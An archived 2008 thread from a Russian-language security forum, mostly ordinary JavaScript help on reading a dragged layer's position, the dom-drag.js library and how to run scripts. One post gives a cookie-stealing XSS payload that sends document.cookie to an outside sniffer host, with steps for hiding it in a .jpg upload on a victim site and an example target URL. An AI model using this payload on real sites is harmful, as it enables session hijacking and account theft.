ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
09.04.2008, 01:06
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028
Репутация:
2371
|
|
astrologer, но это не валидно
|
|
|
09.04.2008, 02:44
|
|
Познающий
Регистрация: 01.10.2007
Сообщений: 40
Провел на форуме:
172670
Репутация:
15
|
|
Я двигаю слой. Как узнать текущее положение слоя по x и по у? А впоследствии записать эти значения в файл.
|
|
|
|
09.04.2008, 09:04
|
|
Участник форума
Регистрация: 01.02.2007
Сообщений: 286
Провел на форуме:
804931
Репутация:
526
|
|
offsetLeft и offsetTop.
А в файл самим JS не запишешь (если мы говорим о клиенте).
На серве легче всего средствами php. Передаешь из JS-скрипта значения на PHP-скрипт, и записываешь их в файл.
|
|
|
|
09.04.2008, 11:06
|
|
Познающий
Регистрация: 01.10.2007
Сообщений: 40
Провел на форуме:
172670
Репутация:
15
|
|
VDShark, не получилось, FF вообще не показывает такой параметр, а IE пишет "undefinied" =\
Вот пример того, что я делаю, помоги пожалуйста 
http://webfile.ru/1860086
надо, чтобы скрипт показывал текущее положение слоя по х и по у
Последний раз редактировалось orcismylife; 09.04.2008 в 11:22..
|
|
|
|
09.04.2008, 11:28
|
|
Постоянный
Регистрация: 30.08.2007
Сообщений: 773
Провел на форуме:
3069349
Репутация:
808
|
|
Isis, можно поменять на title или хранить отдельно в массиве.
orcismylife,
Код:
window.onload = function()
{
var node = document.getElementById('drag1');
alert('offsetTop: ' + node.offsetTop + '\n' + 'offsetLeft: ' + node.offsetLeft);
};
|
|
|
|
09.04.2008, 11:36
|
|
Познающий
Регистрация: 01.10.2007
Сообщений: 40
Провел на форуме:
172670
Репутация:
15
|
|
astrologer, нужно чтобы при каждом дропе писалось значение, а не толко при старте 
Это возможно, учитывая те яваскрипты, которые я дал в архиве?
|
|
|
|
09.04.2008, 11:41
|
|
Постоянный
Регистрация: 30.08.2007
Сообщений: 773
Провел на форуме:
3069349
Репутация:
808
|
|
Сообщение от orcismylife
astrologer, нужно чтобы при каждом дропе писалось значение, а не толко при старте
Это возможно, учитывая те яваскрипты, которые я дал в архиве?
Я лишь показал, что значение всё же определено.
А вообще, думаю, тебе пригодится DOM-Drag.js (автор не я):
Код:
/**************************************************
* dom-drag.js
* 09.25.2001
* www.youngpup.net
**************************************************
* 10.28.2001 - fixed minor bug where events
* sometimes fired off the handle, not the root.
**************************************************/
var Drag = {
obj : null,
init : function(o, oRoot, minX, maxX, minY, maxY, bSwapHorzRef, bSwapVertRef, fXMapper, fYMapper)
{
o.onmousedown = Drag.start;
o.hmode = bSwapHorzRef ? false : true ;
o.vmode = bSwapVertRef ? false : true ;
o.root = oRoot && oRoot != null ? oRoot : o ;
if (o.hmode && isNaN(parseInt(o.root.style.left ))) o.root.style.left = "0px";
if (o.vmode && isNaN(parseInt(o.root.style.top ))) o.root.style.top = "0px";
if (!o.hmode && isNaN(parseInt(o.root.style.right ))) o.root.style.right = "0px";
if (!o.vmode && isNaN(parseInt(o.root.style.bottom))) o.root.style.bottom = "0px";
o.minX = typeof minX != 'undefined' ? minX : null;
o.minY = typeof minY != 'undefined' ? minY : null;
o.maxX = typeof maxX != 'undefined' ? maxX : null;
o.maxY = typeof maxY != 'undefined' ? maxY : null;
o.xMapper = fXMapper ? fXMapper : null;
o.yMapper = fYMapper ? fYMapper : null;
o.root.onDragStart = new Function();
o.root.onDragEnd = new Function();
o.root.onDrag = new Function();
},
start : function(e)
{
var o = Drag.obj = this;
e = Drag.fixE(e);
var y = parseInt(o.vmode ? o.root.style.top : o.root.style.bottom);
var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
o.root.onDragStart(x, y);
o.lastMouseX = e.clientX;
o.lastMouseY = e.clientY;
if (o.hmode) {
if (o.minX != null) o.minMouseX = e.clientX - x + o.minX;
if (o.maxX != null) o.maxMouseX = o.minMouseX + o.maxX - o.minX;
} else {
if (o.minX != null) o.maxMouseX = -o.minX + e.clientX + x;
if (o.maxX != null) o.minMouseX = -o.maxX + e.clientX + x;
}
if (o.vmode) {
if (o.minY != null) o.minMouseY = e.clientY - y + o.minY;
if (o.maxY != null) o.maxMouseY = o.minMouseY + o.maxY - o.minY;
} else {
if (o.minY != null) o.maxMouseY = -o.minY + e.clientY + y;
if (o.maxY != null) o.minMouseY = -o.maxY + e.clientY + y;
}
document.onmousemove = Drag.drag;
document.onmouseup = Drag.end;
return false;
},
drag : function(e)
{
e = Drag.fixE(e);
var o = Drag.obj;
var ey = e.clientY;
var ex = e.clientX;
var y = parseInt(o.vmode ? o.root.style.top : o.root.style.bottom);
var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
var nx, ny;
if (o.minX != null) ex = o.hmode ? Math.max(ex, o.minMouseX) : Math.min(ex, o.maxMouseX);
if (o.maxX != null) ex = o.hmode ? Math.min(ex, o.maxMouseX) : Math.max(ex, o.minMouseX);
if (o.minY != null) ey = o.vmode ? Math.max(ey, o.minMouseY) : Math.min(ey, o.maxMouseY);
if (o.maxY != null) ey = o.vmode ? Math.min(ey, o.maxMouseY) : Math.max(ey, o.minMouseY);
nx = x + ((ex - o.lastMouseX) * (o.hmode ? 1 : -1));
ny = y + ((ey - o.lastMouseY) * (o.vmode ? 1 : -1));
if (o.xMapper) nx = o.xMapper(y)
else if (o.yMapper) ny = o.yMapper(x)
Drag.obj.root.style[o.hmode ? "left" : "right"] = nx + "px";
Drag.obj.root.style[o.vmode ? "top" : "bottom"] = ny + "px";
Drag.obj.lastMouseX = ex;
Drag.obj.lastMouseY = ey;
Drag.obj.root.onDrag(nx, ny);
return false;
},
end : function()
{
document.onmousemove = null;
document.onmouseup = null;
Drag.obj.root.onDragEnd( parseInt(Drag.obj.root.style[Drag.obj.hmode ? "left" : "right"]),
parseInt(Drag.obj.root.style[Drag.obj.vmode ? "top" : "bottom"]));
Drag.obj = null;
},
fixE : function(e)
{
if (typeof e == 'undefined') e = window.event;
if (typeof e.layerX == 'undefined') e.layerX = e.offsetX;
if (typeof e.layerY == 'undefined') e.layerY = e.offsetY;
return e;
}
};
Тут нужно только необходимые параметры указать.
|
|
|
|
09.04.2008, 14:18
|
|
Новичок
Регистрация: 27.02.2007
Сообщений: 5
Провел на форуме:
157807
Репутация:
5
|
|
Вопрос к отцам. подскажите как вставить код xss-ки в jpg?
|
|
|
|
09.04.2008, 14:39
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
Сообщение от servior
подскажите как вставить код xss-ки в jpg?
ды очень просто. берёш запихиваеш код передачи куков на сниф
Код:
<script>img = new Image(); img.src = "http://antichat.org/s/red.gif?"+document.cookie;</script>
в текст документ и сохраняеш с расширением .jpg и пытаешся залить эту картинку на сайт жертвы. если есть фильтрация то скажет что формат не поддерживается.. если нет то картинка загрузится и значит xss есть
вот пример такой уязвимости хсс в картинке на яндэксе
http://narod.yandex.ru/community/photo/48/156948.jpg
скрипт в картинке можно залить в поле Фотография когда создаёш сообщество.
но такие хсс в картинках актуальны только под осликом
|
|
|
|
09.04.2008, 15:15
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
Сообщение от Rogun
Сорри за такой вопрос вопрос, но как юзать Java скрипт?
Я скачал там и у меня как обычный тестовый фаил только в формате Java
Надо ещё программы для чтения ява скриптов устанавливать или как?
интерпретатор джава скрипта уже установлен в винде C:\WINDOWS\system32\cscript.exe
а выполнять java скрипты можно например так
создаёш текстовый документ пишеш в нём
Код:
<script>
тут твой скрипт
</script>
и сохраняеш с расширением .html
или например если хочеш выполнить скрипт который у тебя находится в файле скрипт.js то создаёш текстовый документ пишеш в нём
Код:
<script src="путь к срипту/скрипт.js"></script>
и сохраняеш с расширением .html
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
